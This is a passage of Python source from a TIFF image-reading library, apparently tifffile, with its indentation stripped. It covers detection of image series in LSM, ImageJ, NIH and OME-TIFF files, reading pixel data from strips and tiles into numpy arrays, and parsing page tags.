dims = {b'X': 'X', b'Y': 'Y', b'Z': 'Z', b'T': 'T',
b'WAVELENGTH': 'C', b'TIME': 'T', b'XY': 'R',
b'EVENT': 'V', b'EXPOSURE': 'L'}
mmhd = list(reversed(page0.mm_header.dimensions))
series = [Record(
axes=''.join(dims.get(i[0].strip().upper(), 'Q')
for i in mmhd if i[1] > 1),
shape=tuple(int(i[1]) for i in mmhd if i[1] > 1),
pages=self.pages, dtype=numpy.dtype(page0.dtype))]
elif self.is_lsm:
lsmi = page0.cz_lsm_info
axes = CZ_SCAN_TYPES[lsmi.scan_type]
if page0.is_rgb:
axes = axes.replace('C', '').replace('XY', 'XYC')
axes = axes[::-1]
shape = tuple(getattr(lsmi, CZ_DIMENSIONS[i]) for i in axes)
pages = [p for p in self.pages if not p.is_reduced]
series = [Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype))]
if len(pages) != len(self.pages): # reduced RGB pages
pages = [p for p in self.pages if p.is_reduced]
cp = 1
i = 0
while cp < len(pages) and i < len(shape)-2:
cp *= shape[i]
i += 1
shape = shape[:i] + pages[0].shape
axes = axes[:i] + 'CYX'
series.append(Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype)))
elif self.is_imagej:
shape = []
axes = []
ij = page0.imagej_tags
if 'frames' in ij:
shape.append(ij['frames'])
axes.append('T')
if 'slices' in ij:
shape.append(ij['slices'])
axes.append('Z')
if 'channels' in ij and not self.is_rgb:
shape.append(ij['channels'])
axes.append('C')
remain = len(self.pages) // (product(shape) if shape else 1)
if remain > 1:
shape.append(remain)
axes.append('I')
shape.extend(page0.shape)
axes.extend(page0.axes)
axes = ''.join(axes)
series = [Record(pages=self.pages, shape=tuple(shape), axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif self.is_nih:
if len(self.pages) == 1:
shape = page0.shape
axes = page0.axes
else:
shape = (len(self.pages),) + page0.shape
axes = 'I' + page0.axes
series = [Record(pages=self.pages, shape=shape, axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif page0.is_shaped:
# TODO: shaped files can contain multiple series
shape = page0.tags['image_description'].value[7:-1]
shape = tuple(int(i) for i in shape.split(b','))
series = [Record(pages=self.pages, shape=shape,
axes='Q' * len(shape),
dtype=numpy.dtype(page0.dtype))]
# generic detection of series
if not series:
shapes = []
pages = {}
for page in self.pages:
if not page.shape:
continue
shape = page.shape + (page.axes,
page.compression in TIFF_DECOMPESSORS)
if shape not in pages:
shapes.append(shape)
pages[shape] = [page]
else:
pages[shape].append(page)
series = [Record(pages=pages[s],
axes=(('I' + s[-2])
if len(pages[s]) > 1 else s[-2]),
dtype=numpy.dtype(pages[s][0].dtype),
shape=((len(pages[s]), ) + s[:-2]
if len(pages[s]) > 1 else s[:-2]))
for s in shapes]
# remove empty series, e.g. in MD Gel files
series = [s for s in series if sum(s.shape) > 0]
return series
def asarray(self, key=None, series=None, memmap=False):
"""Return image data from multiple TIFF pages as numpy array.
By default the first image series is returned.
Parameters
----------
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages to return as array.
memmap : bool
If True, return an array stored in a binary file on disk
if possible.
"""
if key is None and series is None:
series = 0
if series is not None:
pages = self.series[series].pages
else:
pages = self.pages
if key is None:
pass
elif isinstance(key, int):
pages = [pages[key]]
elif isinstance(key, slice):
pages = pages[key]
elif isinstance(key, collections.Iterable):
pages = [pages[k] for k in key]
else:
raise TypeError("key must be an int, slice, or sequence")
if not len(pages):
raise ValueError("no pages selected")
if self.is_nih:
if pages[0].is_palette:
result = stack_pages(pages, colormapped=False, squeeze=False)
result = numpy.take(pages[0].color_map, result, axis=1)
result = numpy.swapaxes(result, 0, 1)
else:
result = stack_pages(pages, memmap=memmap,
colormapped=False, squeeze=False)
elif len(pages) == 1:
return pages[0].asarray(memmap=memmap)
elif self.is_ome:
assert not self.is_palette, "color mapping disabled for ome-tiff"
if any(p is None for p in pages):
# zero out missing pages
firstpage = next(p for p in pages if p)
nopage = numpy.zeros_like(
firstpage.asarray(memmap=False))
s = self.series[series]
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=s.dtype, shape=s.shape)
result = result.reshape(-1)
else:
result = numpy.empty(s.shape, s.dtype).reshape(-1)
index = 0
class KeepOpen:
# keep Tiff files open between consecutive pages
def __init__(self, parent, close):
self.master = parent
self.parent = parent
self._close = close
def open(self, page):
if self._close and page and page.parent != self.parent:
if self.parent != self.master:
self.parent.filehandle.close()
self.parent = page.parent
self.parent.filehandle.open()
def close(self):
if self._close and self.parent != self.master:
self.parent.filehandle.close()
keep = KeepOpen(self, self._multifile_close)
for page in pages:
keep.open(page)
if page:
a = page.asarray(memmap=False, colormapped=False,
reopen=False)
else:
a = nopage
try:
result[index:index + a.size] = a.reshape(-1)
except ValueError as e:
warnings.warn("ome-tiff: %s" % e)
break
index += a.size
keep.close()
else:
result = stack_pages(pages, memmap=memmap)
if key is None:
try:
result.shape = self.series[series].shape
except ValueError:
try:
warnings.warn("failed to reshape %s to %s" % (
result.shape, self.series[series].shape))
# try series of expected shapes
result.shape = (-1,) + self.series[series].shape
except ValueError:
# revert to generic shape
result.shape = (-1,) + pages[0].shape
else:
result.shape = (-1,) + pages[0].shape
return result
def _omeseries(self):
"""Return image series in OME-TIFF file(s)."""
root = etree.fromstring(self.pages[0].tags['image_description'].value)
uuid = root.attrib.get('UUID', None)
self._files = {uuid: self}
dirname = self._fh.dirname
modulo = {}
result = []
for element in root:
if element.tag.endswith('BinaryOnly'):
warnings.warn("ome-xml: not an ome-tiff master file")
break
if element.tag.endswith('StructuredAnnotations'):
for annot in element:
if not annot.attrib.get('Namespace',
'').endswith('modulo'):
continue
for value in annot:
for modul in value:
for along in modul:
if not along.tag[:-1].endswith('Along'):
continue
axis = along.tag[-1]
newaxis = along.attrib.get('Type', 'other')
newaxis = AXES_LABELS[newaxis]
if 'Start' in along.attrib:
labels = range(
int(along.attrib['Start']),
int(along.attrib['End']) + 1,
int(along.attrib.get('Step', 1)))
else:
labels = [label.text for label in along
if label.tag.endswith('Label')]
modulo[axis] = (newaxis, labels)
if not element.tag.endswith('Image'):
continue
for pixels in element:
if not pixels.tag.endswith('Pixels'):
continue
atr = pixels.attrib
dtype = atr.get('Type', None)
axes = ''.join(reversed(atr['DimensionOrder']))
shape = list(int(atr['Size'+ax]) for ax in axes)
size = product(shape[:-2])
ifds = [None] * size
for data in pixels:
if not data.tag.endswith('TiffData'):
continue
atr = data.attrib
ifd = int(atr.get('IFD', 0))
num = int(atr.get('NumPlanes', 1 if 'IFD' in atr else 0))
num = int(atr.get('PlaneCount', num))
idx = [int(atr.get('First'+ax, 0)) for ax in axes[:-2]]
try:
idx = numpy.ravel_multi_index(idx, shape[:-2])
except ValueError:
# ImageJ produces invalid ome-xml when cropping
warnings.warn("ome-xml: invalid TiffData index")
continue
for uuid in data:
if not uuid.tag.endswith('UUID'):
continue
if uuid.text not in self._files:
if not self._multifile:
# abort reading multifile OME series
# and fall back to generic series
return []
fname = uuid.attrib['FileName']
try:
tif = TiffFile(os.path.join(dirname, fname))
except (IOError, ValueError):
tif.close()
warnings.warn(
"ome-xml: failed to read '%s'" % fname)
break
self._files[uuid.text] = tif
if self._multifile_close:
tif.close()
pages = self._files[uuid.text].pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
# only process first uuid
break
else:
pages = self.pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
if all(i is None for i in ifds):
# skip images without data
continue
dtype = next(i for i in ifds if i).dtype
result.append(Record(axes=axes, shape=shape, pages=ifds,
dtype=numpy.dtype(dtype)))
for record in result:
for axis, (newaxis, labels) in modulo.items():
i = record.axes.index(axis)
size = len(labels)
if record.shape[i] == size:
record.axes = record.axes.replace(axis, newaxis, 1)
else:
record.shape[i] //= size
record.shape.insert(i+1, size)
record.axes = record.axes.replace(axis, axis+newaxis, 1)
record.shape = tuple(record.shape)
# squeeze dimensions
for record in result:
record.shape, record.axes = squeeze_axes(record.shape, record.axes)
return result
def __len__(self):
"""Return number of image pages in file."""
return len(self.pages)
def __getitem__(self, key):
"""Return specified page."""
return self.pages[key]
def __iter__(self):
"""Return iterator over pages."""
return iter(self.pages)
def __str__(self):
"""Return string containing information about file."""
result = [
self._fh.name.capitalize(),
format_size(self._fh.size),
{'<': 'little endian', '>': 'big endian'}[self.byteorder]]
if self.is_bigtiff:
result.append("bigtiff")
if len(self.pages) > 1:
result.append("%i pages" % len(self.pages))
if len(self.series) > 1:
result.append("%i series" % len(self.series))
if len(self._files) > 1:
result.append("%i files" % (len(self._files)))
return ", ".join(result)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
@lazyattr
def fstat(self):
try:
return os.fstat(self._fh.fileno())
except Exception: # io.UnsupportedOperation
return None
@lazyattr
def is_bigtiff(self):
return self.offset_size != 4
@lazyattr
def is_rgb(self):
return all(p.is_rgb for p in self.pages)
@lazyattr
def is_palette(self):
return all(p.is_palette for p in self.pages)
@lazyattr
def is_mdgel(self):
return any(p.is_mdgel for p in self.pages)
@lazyattr
def is_mediacy(self):
return any(p.is_mediacy for p in self.pages)
@lazyattr
def is_stk(self):
return all(p.is_stk for p in self.pages)
@lazyattr
def is_lsm(self):
return self.pages[0].is_lsm
@lazyattr
def is_imagej(self):
return self.pages[0].is_imagej
@lazyattr
def is_micromanager(self):
return self.pages[0].is_micromanager
@lazyattr
def is_nih(self):
return self.pages[0].is_nih
@lazyattr
def is_fluoview(self):
return self.pages[0].is_fluoview
@lazyattr
def is_ome(self):
return self.pages[0].is_ome
class TiffPage(object):
"""A TIFF image file directory (IFD).
Attributes
----------
index : int
Index of page in file.
dtype : str {TIFF_SAMPLE_DTYPES}
Data type of image, colormapped if applicable.
shape : tuple
Dimensions of the image array in TIFF page,
colormapped and with one alpha channel if applicable.
axes : str
Axes label codes:
'X' width, 'Y' height, 'S' sample, 'I' image series|page|plane,
'Z' depth, 'C' color|em-wavelength|channel, 'E' ex-wavelength|lambda,
'T' time, 'R' region|tile, 'A' angle, 'P' phase, 'H' lifetime,
'L' exposure, 'V' event, 'Q' unknown, '_' missing
tags : TiffTags
Dictionary of tags in page.
Tag values are also directly accessible as attributes.
color_map : numpy array
Color look up table, if exists.
cz_lsm_scan_info: Record(dict)
LSM scan info attributes, if exists.
imagej_tags: Record(dict)
Consolidated ImageJ description and metadata tags, if exists.
uic_tags: Record(dict)
Consolidated MetaMorph STK/UIC tags, if exists.
All attributes are read-only.
Notes
-----
The internal, normalized '_shape' attribute is 6 dimensional:
0. number planes (stk)
1. planar samples_per_pixel
2. image_depth Z (sgi)
3. image_length Y
4. image_width X
5. contig samples_per_pixel
"""
def __init__(self, parent):
"""Initialize instance from file."""
self.parent = parent
self.index = len(parent.pages)
self.shape = self._shape = ()
self.dtype = self._dtype = None
self.axes = ""
self.tags = TiffTags()
self._fromfile()
self._process_tags()
def _fromfile(self):
"""Read TIFF IFD structure and its tags from file.
File cursor must be at storage position of IFD offset and is left at
offset to next IFD.
Raises StopIteration if offset (first bytes read) is 0.
"""
fh = self.parent.filehandle
byteorder = self.parent.byteorder
offset_size = self.parent.offset_size
fmt = {4: 'I', 8: 'Q'}[offset_size]
offset = struct.unpack(byteorder + fmt, fh.read(offset_size))[0]
if not offset:
raise StopIteration()
# read standard tags
tags = self.tags
fh.seek(offset)
fmt, size = {4: ('H', 2), 8: ('Q', 8)}[offset_size]
try:
numtags = struct.unpack(byteorder + fmt, fh.read(size))[0]
except Exception:
warnings.warn("corrupted page list")
raise StopIteration()
tagcode = 0
for _ in range(numtags):
try:
tag = TiffTag(self.parent)
# print(tag)
except TiffTag.Error as e:
warnings.warn(str(e))
continue
if tagcode > tag.code:
# expected for early LSM and tifffile versions
warnings.warn("tags are not ordered by code")
tagcode = tag.code
if tag.name not in tags:
tags[tag.name] = tag
else:
# some files contain multiple IFD with same code
# e.g. MicroManager files contain two image_description
i = 1
while True:
name = "%s_%i" % (tag.name, i)
if name not in tags:
tags[name] = tag
break
pos = fh.tell()
if self.is_lsm or (self.index and self.parent.is_lsm):
# correct non standard LSM bitspersample tags
self.tags['bits_per_sample']._correct_lsm_bitspersample(self)
if self.is_lsm:
# read LSM info subrecords
for name, reader in CZ_LSM_INFO_READERS.items():
try:
offset = self.cz_lsm_info['offset_'+name]
except KeyError:
continue
if offset < 8:
# older LSM revision
continue
fh.seek(offset)
try:
setattr(self, 'cz_lsm_'+name, reader(fh))
except ValueError:
pass
elif self.is_stk and 'uic1tag' in tags and not tags['uic1tag'].value:
# read uic1tag now that plane count is known
uic1tag = tags['uic1tag']
fh.seek(uic1tag.value_offset)
tags['uic1tag'].value = Record(
read_uic1tag(fh, byteorder, uic1tag.dtype, uic1tag.count,
tags['uic2tag'].count))
fh.seek(pos)
def _process_tags(self):
"""Validate standard tags and initialize attributes.
Raise ValueError if tag values are not supported.
"""
tags = self.tags
for code, (name, default, dtype, count, validate) in TIFF_TAGS.items():
if not (name in tags or default is None):
tags[name] = TiffTag(code, dtype=dtype, count=count,
value=default, name=name)
if name in tags and validate:
try:
if tags[name].count == 1:
setattr(self, name, validate[tags[name].value])
else:
setattr(self, name, tuple(
validate[value] for value in tags[name].value))
except KeyError:
raise ValueError("%s.value (%s) not supported" %
(name, tags[name].value))
tag = tags['bits_per_sample']
if tag.count == 1:
self.bits_per_sample = tag.value
else:
# LSM might list more items than samples_per_pixel
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.bits_per_sample = value
else:
self.bits_per_sample = value[0]
tag = tags['sample_format']
if tag.count == 1:
self.sample_format = TIFF_SAMPLE_FORMATS[tag.value]
else:
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.sample_format = [TIFF_SAMPLE_FORMATS[v] for v in value]
else:
self.sample_format = TIFF_SAMPLE_FORMATS[value[0]]
if 'photometric' not in tags:
self.photometric = None
if 'image_depth' not in tags:
self.image_depth = 1
if 'image_length' in tags:
self.strips_per_image = int(math.floor(
float(self.image_length + self.rows_per_strip - 1) /
self.rows_per_strip))
else:
self.strips_per_image = 0
key = (self.sample_format, self.bits_per_sample)
self.dtype = self._dtype = TIFF_SAMPLE_DTYPES.get(key, None)
if 'image_length' not in self.tags or 'image_width' not in self.tags:
# some GEL file pages are missing image data
self.image_length = 0
self.image_width = 0
self.image_depth = 0
self.strip_offsets = 0
self._shape = ()
self.shape = ()
self.axes = ''
if self.is_palette:
self.dtype = self.tags['color_map'].dtype[1]
self.color_map = numpy.array(self.color_map, self.dtype)
dmax = self.color_map.max()
if dmax < 256:
self.dtype = numpy.uint8
self.color_map = self.color_map.astype(self.dtype)
#else:
# self.dtype = numpy.uint8
# self.color_map >>= 8
# self.color_map = self.color_map.astype(self.dtype)
self.color_map.shape = (3, -1)
# determine shape of data
image_length = self.image_length
image_width = self.image_width
image_depth = self.image_depth
samples_per_pixel = self.samples_per_pixel
if self.is_stk:
assert self.image_depth == 1
planes = self.tags['uic2tag'].count
if self.is_contig:
self._shape = (planes, 1, 1, image_length, image_width,
samples_per_pixel)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, image_length, image_width,
samples_per_pixel)
self.axes = 'YXS'
else:
self._shape = (planes, samples_per_pixel, 1, image_length,
image_width, 1)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, samples_per_pixel, image_length,
image_width)
self.axes = 'SYX'
# detect type of series
if planes == 1:
self.shape = self.shape[1:]
elif numpy.all(self.uic2tag.z_distance != 0):
self.axes = 'Z' + self.axes
elif numpy.all(numpy.diff(self.uic2tag.time_created) != 0):
self.axes = 'T' + self.axes
else:
self.axes = 'I' + self.axes
# DISABLED
if self.is_palette:
assert False, "color mapping disabled for stk"
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, planes, image_length, image_width)
else:
self.shape = (3, planes, image_depth, image_length,
image_width)
self.axes = 'C' + self.axes
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
elif self.is_palette:
samples = 1
if 'extra_samples' in self.tags:
samples += len(self.extra_samples)
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples)
else:
self._shape = (1, samples, image_depth, image_length,
image_width, 1)
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, image_length, image_width)
self.axes = 'CYX'
else:
self.shape = (3, image_depth, image_length, image_width)
self.axes = 'CZYX'
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
elif self.is_rgb or samples_per_pixel > 1:
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples_per_pixel)
if image_depth == 1:
self.shape = (image_length, image_width, samples_per_pixel)
self.axes = 'YXS'
else:
self.shape = (image_depth, image_length, image_width,
samples_per_pixel)
self.axes = 'ZYXS'
else:
self._shape = (1, samples_per_pixel, image_depth,
image_length, image_width, 1)
if image_depth == 1:
self.shape = (samples_per_pixel, image_length, image_width)
self.axes = 'SYX'
else:
self.shape = (samples_per_pixel, image_depth,
image_length, image_width)
self.axes = 'SZYX'
if False and self.is_rgb and 'extra_samples' in self.tags:
# DISABLED: only use RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for exs in extra_samples:
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
self.shape = self.shape[:-1] + (4,)
else:
self.shape = (4,) + self.shape[1:]
break
else:
self._shape = (1, 1, image_depth, image_length, image_width, 1)
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
if not self.compression and 'strip_byte_counts' not in tags:
self.strip_byte_counts = (
product(self.shape) * (self.bits_per_sample // 8), )
assert len(self.shape) == len(self.axes)
def asarray(self, squeeze=True, colormapped=True, rgbonly=False,
scale_mdgel=False, memmap=False, reopen=True):
"""Read image data from file and return as numpy array.
Raise ValueError if format is unsupported.
If any of 'squeeze', 'colormapped', or 'rgbonly' are not the default,
the shape of the returned array might be different from the page shape.
Parameters
----------
squeeze : bool
If True, all length-1 dimensions (except X and Y) are
squeezed out from result.
colormapped : bool
If True, color mapping is applied for palette-indexed images.
rgbonly : bool
If True, return RGB(A) image without additional extra samples.
memmap : bool
If True, use numpy.memmap to read arrays from file if possible.
For use on 64 bit systems and files with few huge contiguous data.
reopen : bool
If True and the parent file handle is closed, the file is
temporarily re-opened (and closed if no exception occurs).
scale_mdgel : bool
If True, MD Gel data will be scaled according to the private
metadata in the second TIFF page. The dtype will be float32.
"""
if not self._shape:
return
if self.dtype is None:
raise ValueError("data type not supported: %s%i" % (
self.sample_format, self.bits_per_sample))
if self.compression not in TIFF_DECOMPESSORS:
raise ValueError("cannot decompress %s" % self.compression)
tag = self.tags['sample_format']
if tag.count != 1 and any((i-tag.value[0] for i in tag.value)):
raise ValueError("sample formats don't match %s" % str(tag.value))
fh = self.parent.filehandle
closed = fh.closed
if closed:
if reopen:
fh.open()
else:
raise IOError("file handle is closed")
dtype = self._dtype
shape = self._shape
image_width = self.image_width
image_length = self.image_length
image_depth = self.image_depth
typecode = self.parent.byteorder + dtype
bits_per_sample = self.bits_per_sample
if self.is_tiled:
if 'tile_offsets' in self.tags:
byte_counts = self.tile_byte_counts
offsets = self.tile_offsets
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
tile_width = self.tile_width
tile_length = self.tile_length
tile_depth = self.tile_depth if 'tile_depth' in self.tags else 1
tw = (image_width + tile_width - 1) // tile_width
tl = (image_length + tile_length - 1) // tile_length
td = (image_depth + tile_depth - 1) // tile_depth
shape = (shape[0], shape[1],
td*tile_depth, tl*tile_length, tw*tile_width, shape[-1])
tile_shape = (tile_depth, tile_length, tile_width, shape[-1])
runlen = tile_width
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
runlen = image_width
if any(o < 2 for o in offsets):
raise ValueError("corrupted page")
if memmap and self._is_memmappable(rgbonly, colormapped):
result = fh.memmap_array(typecode, shape, offset=offsets[0])
elif self.is_contiguous:
fh.seek(offsets[0])
result = fh.read_array(typecode, product(shape))
result = result.astype('=' + dtype)
else:
if self.is_contig:
runlen *= self.samples_per_pixel
if bits_per_sample in (8, 16, 32, 64, 128):
if (bits_per_sample * runlen) % 8:
raise ValueError("data and sample size mismatch")
def unpack(x):
try:
return numpy.fromstring(x, typecode)
except ValueError as e:
# strips may be missing EOI
warnings.warn("unpack: %s" % e)
xlen = ((len(x) // (bits_per_sample // 8))
* (bits_per_sample // 8))
return numpy.fromstring(x[:xlen], typecode)
elif isinstance(bits_per_sample, tuple):
def unpack(x):
return unpackrgb(x, typecode, bits_per_sample)
else:
def unpack(x):
return unpackints(x, typecode, bits_per_sample, runlen)
decompress = TIFF_DECOMPESSORS[self.compression]
if self.compression == 'jpeg':
table = self.jpeg_tables if 'jpeg_tables' in self.tags else b''
decompress = lambda x: decodejpg(x, table, self.photometric)
if self.is_tiled:
result = numpy.empty(shape, dtype)
tw, tl, td, pl = 0, 0, 0, 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
tile = unpack(decompress(fh.read(bytecount)))
tile.shape = tile_shape
if self.predictor == 'horizontal':
numpy.cumsum(tile, axis=-2, dtype=dtype, out=tile)
result[0, pl, td:td+tile_depth,
tl:tl+tile_length, tw:tw+tile_width, :] = tile
del tile
tw += tile_width
if tw >= shape[4]:
tw, tl = 0, tl + tile_length
if tl >= shape[3]:
tl, td = 0, td + tile_depth
if td >= shape[2]:
td, pl = 0, pl + 1
result = result[...,
:image_depth, :image_length, :image_width, :]
else:
strip_size = (self.rows_per_strip * self.image_width *
self.samples_per_pixel)
result = numpy.empty(shape, dtype).reshape(-1)
index = 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
strip = fh.read(bytecount)
strip = decompress(strip)
strip = unpack(strip)
size = min(result.size, strip.size, strip_size,
result.size - index)
result[index:index+size] = strip[:size]
del strip
index += size
result.shape = self._shape
if self.predictor == 'horizontal' and not (self.is_tiled and not
self.is_contiguous):
# work around bug in LSM510 software
if not (self.parent.is_lsm and not self.compression):
numpy.cumsum(result, axis=-2, dtype=dtype, out=result)
if colormapped and self.is_palette:
if self.color_map.shape[1] >= 2**bits_per_sample:
# FluoView and LSM might fail here
result = numpy.take(self.color_map,
result[:, 0, :, :, :, 0], axis=1)
elif rgbonly and self.is_rgb and 'extra_samples' in self.tags:
# return only RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for i, exs in enumerate(extra_samples):
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
result = result[..., [0, 1, 2, 3+i]]
else:
result = result[:, [0, 1, 2, 3+i]]
break
else:
if self.is_contig:
result = result[..., :3]
else:
result = result[:, :3]
if squeeze:
try:
result.shape = self.shape
except ValueError:
warnings.warn("failed to reshape from %s to %s" % (
str(result.shape), str(self.shape)))
if scale_mdgel and self.parent.is_mdgel:
# MD Gel stores private metadata in the second page
tags = self.parent.pages[1]
if tags.md_file_tag in (2, 128):
scale = tags.md_scale_pixel
scale = scale[0] / scale[1] # rational
result = result.astype('float32')
if tags.md_file_tag == 2:
result **= 2 # squary root data format
result *= scale
if closed:
# TODO: file remains open if an exception occurred above
fh.close()
return result
def _is_memmappable(self, rgbonly, colormapped):
"""Return if image data in file can be memory mapped."""
if not self.parent.filehandle.is_file or not self.is_contiguous:
return False
return not (self.predictor or
(rgbonly and 'extra_samples' in self.tags) or
(colormapped and self.is_palette) or
({'big': '>', 'little': '<'}[sys.byteorder] !=
self.parent.byteorder))
@lazyattr
def is_contiguous(self):
"""Return offset and size of contiguous data, else None.
Excludes prediction and colormapping.
"""
if self.compression or self.bits_per_sample not in (8, 16, 32, 64):
return
if self.is_tiled:
if (self.image_width != self.tile_width or
self.image_length % self.tile_length or
self.tile_width % 16 or self.tile_length % 16):
return
if ('image_depth' in self.tags and 'tile_depth' in self.tags and
(self.image_length != self.tile_length or
self.image_depth % self.tile_depth)):
return
offsets = self.tile_offsets
byte_counts = self.tile_byte_counts
else:
offsets = self.strip_offsets
byte_counts = self.strip_byte_counts
if len(offsets) == 1:
return offsets[0], byte_counts[0]
if self.is_stk or all(offsets[i] + byte_counts[i] == offsets[i+1]
or byte_counts[i+1] == 0 # no data/ignore offset
for i in range(len(offsets)-1)):
return offsets[0], sum(byte_counts)
def __str__(self):
"""Return string containing information about page."""
s = ', '.join(s for s in (
' x '.join(str(i) for i in self.shape),
str(numpy.dtype(self.dtype)),
'%s bit' % str(self.bits_per_sample),
self.photometric if 'photometric' in self.tags else '',
self.compression if self.compression else 'raw',
'|'.join(t[3:] for t in (
'is_stk', 'is_lsm', 'is_nih', 'is_ome', 'is_imagej',
'is_micromanager', 'is_fluoview', 'is_mdgel', 'is_mediacy',
'is_sgi', 'is_reduced', 'is_tiled',
'is_contiguous') if getattr(self, t))) if s)
return "Page %i: %s" % (self.index, s)
def __getattr__(self, name):
"""Return tag value."""
if name in self.tags:
value = self.tags[name].value
setattr(self, name, value)
return value
raise AttributeError(name)
@lazyattr
def uic_tags(self):
"""Consolidate UIC tags."""
if not self.is_stk:
raise AttributeError("uic_tags")
tags = self.tags
result = Record()
result.number_planes = tags['uic2tag'].count
if 'image_description' in tags:
result.plane_descriptions = self.image_description.split(b'\x00')
if 'uic1tag' in tags:
result.update(tags['uic1tag'].value)
if 'uic3tag' in tags:
result.update(tags['uic3tag'].value) # wavelengths
if 'uic4tag' in tags:
result.update(tags['uic4tag'].value) # override uic1 tags
uic2tag = tags['uic2tag'].value
result.z_distance = uic2tag.z_distance
result.time_created = uic2tag.time_created
result.time_modified = uic2tag.time_modified
try:
result.datetime_created = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_created, uic2tag.time_created)]
result.datetime_modified = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_modified, uic2tag.time_modified)]
except ValueError as e:
warnings.warn("uic_tags: %s" % e)
return result
@lazyattr
def imagej_tags(self):
"""Consolidate ImageJ metadata."""
if not self.is_imagej:
raise AttributeError("imagej_tags")
tags = self.tags
if 'image_description_1' in tags:
# MicroManager
result = imagej_description(tags['image_description_1'].value)
else:
result = imagej_description(tags['image_description'].value)
if 'imagej_metadata' in tags:
try:
result.update(imagej_metadata(
tags['imagej_metadata'].value,
tags['imagej_byte_counts'].value,
self.parent.byteorder))
except Exception as e:
warnings.warn(str(e))
return Record(result)
@lazyattr
def is_rgb(self):
"""True if page contains a RGB image."""
return ('photometric' in self.tags and
self.tags['photometric'].value == 2)
@lazyattr
def is_contig(self):
"""True if page contains a contiguous image."""
return ('planar_configuration' in self.tags and
self.tags['planar_configuration'].value == 1)
@lazyattr
def is_palette(self):
"""True if page contains a palette-colored image and not OME or STK."""
try:
# turn off color mapping for OME-TIFF and STK
if self.is_stk or self.is_ome or self.parent.is_ome:
return False
except IndexError:
pass # OME-XML not found in first page
return ('photometric' in self.tags and
self.tags['photometric'].value == 3)
@lazyattr
def is_tiled(self):
"""True if page contains tiled image."""
return 'tile_width' in self.tags
@lazyattr
def is_reduced(self):
"""True if page is a reduced image of another image."""
return bool(self.tags['new_subfile_type'].value & 1)
@lazyattr
def is_mdgel(self):
"""True if page contains md_file_tag tag."""
return 'md_file_tag' in self.tags
@lazyattr
def is_mediacy(self):
"""True if page contains Media Cybernetics Id tag."""
return ('mc_id' in self.tags and
self.tags['mc_id'].value.startswith(b'MC TIFF'))
@lazyattr
def is_stk(self):
"""True if page contains UIC2Tag tag."""
return 'uic2tag' in self.tags
@lazyattr
def is_lsm(self):
"""True if page contains LSM CZ_LSM_INFO tag."""
return 'cz_lsm_info' in self.tags
@lazyattr
def is_fluoview(self):
"""True if page contains FluoView MM_STAMP tag."""
return 'mm_stamp' in self.tags
@lazyattr
def is_nih(self):
"""True if page contains NIH image header."""
return 'nih_image_header' in self.tags
@lazyattr
def is_sgi(self):
"""True if page contains SGI image and tile depth tags."""
return 'image_depth' in self.tags and 'tile_depth' in self.tags
@lazyattr
def is_ome(self):
"""True if page contains OME-XML in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'<?xml version='))
@lazyattr
def is_shaped(self):
"""True if page contains shape in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'shape=('))
@lazyattr
def is_imagej(self):
"""True if page contains ImageJ description."""
return (
('image_description' in self.tags and
self.tags['image_description'].value.startswith(b'ImageJ=')) or
('image_description_1' in self.tags and # Micromanager
self.tags['image_description_1'].value.startswith(b'ImageJ=')))
@lazyattr
def is_micromanager(self):
"""True if page contains Micro-Manager metadata."""
return 'micromanager_metadata' in self.tags
class TiffTag(object):
"""A TIFF tag structure.
Attributes
----------
name : string
Attribute name of tag.
code : int
Decimal code of tag.
dtype : str
Datatype of tag data. One of TIFF_DATA_TYPES.
count : int
Number of values.
value : various types
Tag data as Python object.
value_offset : int
Location of value in file, if any.
All attributes are read-only.
"""
__slots__ = ('code', 'name', 'count', 'dtype', 'value', 'value_offset',
'_offset', '_value', '_type')
class Error(Exception):
pass
def __init__(self, arg, **kwargs):
"""Initialize instance from file or arguments."""
self._offset = None
if hasattr(arg, '_fh'):
self._fromfile(arg, **kwargs)
else:
self._fromdata(arg, **kwargs)
